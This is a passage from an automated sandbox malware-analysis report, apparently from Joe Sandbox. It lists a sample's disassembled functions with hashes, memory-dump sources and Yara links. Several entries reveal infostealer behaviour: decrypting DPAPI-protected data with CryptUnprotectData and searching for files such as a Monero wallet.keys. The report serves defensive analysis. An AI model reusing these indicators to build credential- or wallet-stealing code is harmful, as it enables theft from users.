                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 15e3a8f3c5186362e8788434c4a175db18164b3392a99ed28161e5c73cbdf6b0
                  • Instruction ID: f6de0f573aa4d34e2bf133ca15d53a4f737948c93cf367cccfb179fe9dc3083b
                  • Opcode Fuzzy Hash: 15e3a8f3c5186362e8788434c4a175db18164b3392a99ed28161e5c73cbdf6b0
                  • Instruction Fuzzy Hash: 6941F674A00A28AFDB24DB58CC95B9BB7B4FB48702F4041D8E618E7290E771AE85CF50
                  Function 00879B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00879B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00879BA3
                  • LocalFree.KERNEL32(?), ref: 00879BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 7d596d0bc6b55c2cfb4ab88c3567c0d08bebeb8fb62d9ae55efa21f076ad996e
                  • Instruction ID: 36ae35bc7f6977da127617f015240ee7fafdfc102bace148f54dd184316e5878
                  • Opcode Fuzzy Hash: 7d596d0bc6b55c2cfb4ab88c3567c0d08bebeb8fb62d9ae55efa21f076ad996e
                  • Instruction Fuzzy Hash: 7C1109B8A00209EFDB04DF94D985AAEB7B5FF89300F108598E815A7350D770AE11CFA1
                  Function 00C38323 Relevance: 4.2, Strings: 2, Instructions: 1669COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +9Rv$zy?{
                  • API String ID: 0-3790884527
                  • Opcode ID: e50b9526e2b491d9846296664c60b3726679024d2c80ed4234134d06efa60b93
                  • Instruction ID: 9a63458ffba3841d33f69c532353ba7c9d995f58fb4548a9dcf37a04f7a211c3
                  • Opcode Fuzzy Hash: e50b9526e2b491d9846296664c60b3726679024d2c80ed4234134d06efa60b93
                  • Instruction Fuzzy Hash: B8B236F3A0C2049FE304AE2DEC8567AFBE9EB94720F16493DE6C4C7344EA7558058697
                  Function 00AEF088 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1G$yrK
                  • API String ID: 0-3332173542
                  • Opcode ID: c498587dc2458f2109be885648b97e83c689890bca0c17c2ceb0c071e8ff9493
                  • Instruction ID: 830adaec10326eda77e2b5e330a98eac2cb9726e3dcc18e02b66687d7e66aa21
                  • Opcode Fuzzy Hash: c498587dc2458f2109be885648b97e83c689890bca0c17c2ceb0c071e8ff9493
                  • Instruction Fuzzy Hash: 355126B3E093285BF300BE79DC45366F7DAEB94360F1A863DEA8893744E9755C0582D2
                  Function 00D55FA8 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6{
                  • API String ID: 0-100773482
                  • Opcode ID: 6b6f2f381737239cf7cb1f10fc8325c3911b36fa0101f33bab6386f48a170404
                  • Instruction ID: 27177c02577babffcd5923714a30b7e441b58f3ae7ff41de21f561d2726c7803
                  • Opcode Fuzzy Hash: 6b6f2f381737239cf7cb1f10fc8325c3911b36fa0101f33bab6386f48a170404
                  • Instruction Fuzzy Hash: 20B126F3A082009FE7109E2CDD8176AB7E5EB94711F2A453DDEC8D3B44E6399C098796
                  Function 0087F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008915B8,00890D96), ref: 0087F71E
                  • StrCmpCA.SHLWAPI(?,008915BC), ref: 0087F76F
                  • StrCmpCA.SHLWAPI(?,008915C0), ref: 0087F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0087FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 186068873348a63ff133bbcc0174ed816ad4a5a8b4042ed03375d6d463d97be9
                  • Instruction ID: 3c57a034743153d1db2a27ad6ffedd1094efa76ca792ab6408e5fc1be717f94e
                  • Opcode Fuzzy Hash: 186068873348a63ff133bbcc0174ed816ad4a5a8b4042ed03375d6d463d97be9
                  • Instruction Fuzzy Hash: D71163318041599BEB18FBA4DC959ED7378FB10300F4042A6A51AD64D2EF346B4ACB63
                  Function 00BAED38 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: z&B
                  • API String ID: 0-3697102250
                  • Opcode ID: 44fc407efcf13a61beba80aab883ac812b18532dbbfefa01e713bfd391dfda7f
                  • Instruction ID: 494c0895abf970bcc239e5dfce07ad38f99b4b7b6783b4de17eeb7a435e20ea6
                  • Opcode Fuzzy Hash: 44fc407efcf13a61beba80aab883ac812b18532dbbfefa01e713bfd391dfda7f
                  • Instruction Fuzzy Hash: 1971ABB3A182048BE3006E3DEC8477ABB97EFD0760F2B863DEAC447784D97559058786
                  Function 00B00BF2 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )uo[
                  • API String ID: 0-2962778631
                  • Opcode ID: 2913228716e316a547ea9ba0172d3316a81b5219d7677358546b1cd0191c9593
                  • Instruction ID: 8a8cd3f5a6c0c4f8a86680202484b33523f9b0e191ec5adf5d92e772f2f12111
                  • Opcode Fuzzy Hash: 2913228716e316a547ea9ba0172d3316a81b5219d7677358546b1cd0191c9593
                  • Instruction Fuzzy Hash: 545128F76182049FF3546E2DEC8576AF7D5EB98310F56093DA7C4C3380FA7998014646
                  Function 00BD6DF5 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7r9
                  • API String ID: 0-1709151655
                  • Opcode ID: aff7481bb2b83d4eb97d072cf22497158861af771080a2b88ef194bbfb356d74
                  • Instruction ID: dd70140049184ce1132f4b279f26d38c42abd3efcd4abbd4c11e2d0164b82f64
                  • Opcode Fuzzy Hash: aff7481bb2b83d4eb97d072cf22497158861af771080a2b88ef194bbfb356d74
                  • Instruction Fuzzy Hash: 5241D9F39093089BE711BD29EC857BAFBD5EB94320F06863CDAD443784EA3654058687
                  Function 00B67C47 Relevance: .2, Instructions: 213COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dff3a08d63f1d9524c0d50ff2a492dc180b6b601528e6b4869d43005c45fa8df
                  • Instruction ID: a8617e7194bc534aef00ecc1b2973be55f5497136dc228588e0691fcef6a2d08
                  • Opcode Fuzzy Hash: dff3a08d63f1d9524c0d50ff2a492dc180b6b601528e6b4869d43005c45fa8df
                  • Instruction Fuzzy Hash: 0751F1B3F192104BF3045D69DC847BABBD6EBD4320F2B453DEAC8D3780D97958058696
                  Function 00BF3B85 Relevance: .2, Instructions: 189COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cac7653bccfed4cb9247c9f51b8ffa622cd226be989393140f763a15e6485561
                  • Instruction ID: 30381022466ff05e468395c052e02cc6270591ba776428a7ae5ef3ba618e0c8e
                  • Opcode Fuzzy Hash: cac7653bccfed4cb9247c9f51b8ffa622cd226be989393140f763a15e6485561
                  • Instruction Fuzzy Hash: 8451FBB3A145145BF3119D2DDC8476BF7D6DBC4320F2A863DDA84D7B84DD79880142D5
                  Function 00B656D1 Relevance: .2, Instructions: 182COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4080f86eca5c8f36ae10d556d5dc2696539eb6ab4c54554c17fc44e81ae79bfa
                  • Instruction ID: d1e9dc17084c53678c7ca89f4fa51ea0433511ecdc98985a4f92320f6ca34c7e
                  • Opcode Fuzzy Hash: 4080f86eca5c8f36ae10d556d5dc2696539eb6ab4c54554c17fc44e81ae79bfa
                  • Instruction Fuzzy Hash: DE5139B2A083049FD308AE2CDC8573EB7D5EF94310F06893DEAC587784E97859448787
                  Function 00B1627F Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
